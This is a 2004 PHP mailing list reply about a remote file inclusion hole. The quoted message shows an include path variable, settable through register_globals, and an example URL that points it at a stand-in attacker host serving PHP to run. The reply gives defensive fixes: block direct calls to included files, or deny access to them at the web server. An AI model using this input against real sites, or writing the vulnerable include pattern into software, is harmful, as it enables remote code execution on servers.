On Friday 10 December 2004 06:05, KJ wrote: > The vunerability occurred where both applications had a variable setting > a base directory of the source code, which was used when including files > throughout the application, i.e.: > > $base_url = '/home/example.com/www'; > include_once ($base_url.'/config.php'); > > In config.php you would then have, for example: > > <?php > include_once ($base_url.'/whatever.php'); > ... > ?> > > Now in each instance register globals was on and all that was needed to > comprimise the site was to have a variable passed in the url to set the > base url to a remote site, which in turn output php to execute, i.e.: > > http://example.com/config.php?base_url=http://myhacksite.example.com Basically this particular case boils down to: "files that are included and should not a be called directly" should not be allowed to be called directly. You can do this at the application level whereby each included file checks whether it was called directly and refuse to run when that is so. Or you can do this on a system level and tell your webserver not to allow access to particular files or directories. -- Jason Wong -> Gremlins Associates -> www.gremlins.biz Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development * ------------------------------------------ Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general ------------------------------------------ /* Brook's Law: Adding manpower to a late software project makes it later. */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
